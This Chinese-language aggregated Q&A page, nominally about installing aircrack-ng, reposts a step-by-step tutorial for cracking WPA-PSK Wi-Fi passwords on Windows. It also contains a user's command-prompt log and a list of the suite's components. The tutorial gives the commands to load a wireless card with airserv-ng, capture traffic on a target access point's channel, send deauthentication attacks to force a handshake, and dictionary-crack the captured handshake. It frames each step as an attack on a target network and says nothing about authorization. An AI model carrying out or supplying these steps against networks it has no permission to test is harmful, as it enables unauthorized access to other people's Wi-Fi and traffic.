怎样安装aircrack-ng
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了怎样安装aircrack-ng相关的知识,希望对你有一定的参考价值。
Aircrack-ng for Windows使用Aircrack-ng for Windows破解WPA(转)
下载地址:http://www.path8.net/tn/wp-content/uploads/2010/10/aircrack-ng-1.1-win.zip
(打开迅雷,复制下载地址,然后新建下载任务,即可下载)
由于在Windows环境下不能如Linux环境般直接调用无线网卡,所以需要使用其他工具将无线网卡载
入,以便攻击工具 能够正常使用。在无线攻击套装Aircrack-ng的Windows版本下内置了这样的工
具,就是airserv-ng。
步骤1:打开CMD,通过cd命令进入到aircrack-ng for Windows版本所在目录,输入airserv-ng,
可以看到如图5-29所示的内容。
图5-29 在CMD下运行airserv-ng
参数解释:
* -p,指定监听的端口,即提供连接服务的端口,默认为666;
* -d,载入无线网卡设备,需要驱动支持;
* -c,指定启动工作频道,一般设置为预攻击AP的工作频道,默认为1;
* -v,调试级别设定。
作为Windows下的破解,第一步就是使用airserv-ng来载入我们当前使用的无线网卡,为后续破解
做准备,命令 如下(注意:在命令中出现的引号一律使用英文下的引号输入):
airserv-ng -d “commview.dll|debug”
或者
airserv-ng -d “commview.dll| my adapter id”
输入完成后airserv-ng会自动搜寻现有无线网卡,会有提示,选择正确的无线网卡直接输入y,此
时airserv- ng就在正常载入驱动后,同时开始监听本地的666端口。换句话说,airserv-ng提供的
是该无线网卡的网络服务,其他计算机上的用户也可以连接到 这个端口来使用这块网卡,如图5-
30所示。
图5-30 airserv-ng工作中
步骤2:现在可以使用airodump-ng来搜索当前无线环境了。注意,要另开启一 个CMD,再输入如下
命令:
airodump-ng 127.0.0.1:666
这里在IP地址处输入为本机即127.0.0.1,端口采用的是默认的666。
图5-31 在CMD下运行airodump-ng
如图5-31所示,当确定预攻击目标AP的频道后,使用组合键Ctrl + C中断,即可使用如下参数来精
确定位目标:
airodump-ng –channel number -w filename 127.0.0.1:666
这里输入“airodump-ng –channel 7 -w onewpa 127.0.0.1:666”,回车后可看到如图5-32所示
的内容。
图5-32 在CMD下运行airodump-ng进行抓包
步骤3:现在,就可以和前面在BackTrack 2中讲述的一样进行Deauth攻击了,另开启一个CMD,输
入(如图5-33所示):
aireplay-ng -0 1 -a AP’s MAC 127.0.0.1:666
参数解释参考前面对应章节。
图5-33 进行Deauth攻击
在个别情况下,可能会在上面命令结束时出现wi_write<>:Operation now progress这样的提示,
这个提示在很多无线网卡下都会出现,意思是当前进程调用被占用时,Deauth攻击在大多数情况下
并不会受此影响。
步骤4:再开启一个CMD,输入命令查看是否捕获到WPA握手数据包。命令如下:
aircrack-ng 捕获的数据包名
如果没有捕获到WPA握手数据包,就会有如图5-34所显示的“0 handshake”,这个时候切回到刚才
aireplay-ng所在的CMD中重复进行Deauth攻击。
图5-34 没有获取到WPA握手数据包
攻击过程中注意观察airodump-ng工作界面,当右上角出现如图5-35所示的提示 时,就表示成功截
获到WPA握手数据包了。
图5-35 成功获取到WPA握手数据包
此时再次使用aircrack-ng 打开捕获的数据包,就可以看到截获到WPA <1 handshake>的显示了,
如图5-36所示,接下来便可以进行WPA本地破解了。
图5-36 载入破解时成功识别出获得的WPA握手数据包
破解WPA-PSK输入命令如下:
aircrack-ng -w password.txt onewpa*.cap
这里介绍一个小技巧,可以在输入数据包名后面加一个*号,来自动将捕获的该名称的所有数据包
整合导入。回车后,显示如图 5-37所示。
图5-37 在CMD下破解WPA-PSK加密
如同在Linux下破解WPA一般耐心地等待,就可以看到WPA密钥成功解出了,如图 5-38所示。
图5-38 成功破解出WPA-PSK密码
*****************
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\\Documents and Settings\\Administrator>cd\\
C:\\>d:
D:\\>cd aircrack-ng
D:\\aircrack-ng>cd bin
D:\\aircrack-ng\\bin>airserv-ng
Airserv-ng 1.1 - (C) 2007, 2008, 2009 Andrea Bittau
http://www.aircrack-ng.org
Usage: airserv-ng <options>
Options:
-h : This help screen
-p <port> : TCP port to listen on (default:666)
-d <iface> : Wifi interface to use
-c <chan> : Channel to use
-v <level> : Debug level (1 to 3; default: 1)
D:\\aircrack-ng\\bin>airserv-ng -d “commview.dll|debug”
\'debug”\' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
D:\\aircrack-ng\\bin>airserv-ng -d "commview.dll|debug"
Opening card commview.dll|debug
Adapter <commview.dll|debug> not supported
airserv-ng: wi_open(): No such file or directory
D:\\aircrack-ng\\bin> 参考技术A
Aircrack-ng
Aircrack-ng是一款网络加密工具
参考技术B 如果是.tar.gz文件不能直接解压,要修改一个文件!我的QQ空间有:78663611 参考技术C 在Linux下装吧,windows很多网卡识别不了的Aircrack-ng介绍
1、介绍
Aircrack-ng主要使用了两种攻击方式进行WEP破解:一种是FMS攻击;一种是KoreK攻击。
2、主要组件
1、aircrack-ng
主要用于WEP及WPA-PSK密码的恢复,主要airodump-ng收集到足够数量的数据包,aircrack-ng就可以自动检测数据包并判断是否可以破解。
2、airmon-ng
用于改变无线网卡工作模式,以便其他工具的顺利使用。
3、airodump-ng
用于捕获802.11数据报文,以便于aircrack-ng破解。
4、aireplay-ng
在进行WEP及WPA-PSK密码恢复时,可以根据需要创建特殊的无线网络数据报文及流量。
5、airserv-ng
可以将无线网卡连接至某一特定端口,为攻击时灵活调用做准备。
6、airolib-ng
进行WPA Rainbow Table攻击时,用于建立特定数据库文件。
7、airdecap-ng
用于解开处于加密状态的数据包。
8、airdriver-ng
用于显示出Aircrack-ng所支持的全部无线网卡芯片列表。
9、airdecloak-ng
用于分析无线数据报文时过滤出指定无线网络数据。
10、packetforge-ng
为注入攻击制作特殊加密报文,主要用于无客户端破解攻击。
11、wesside-ng
自动化的WEP破解工具,加入Fragmentation攻击能力。
12、thiptun-ng
尚处于概念阶段的破解工具,主要针对采用WPA TKIP加密且启用QoS的无线网络。
以上是关于怎样安装aircrack-ng的主要内容,如果未能解决你的问题,请参考以下文章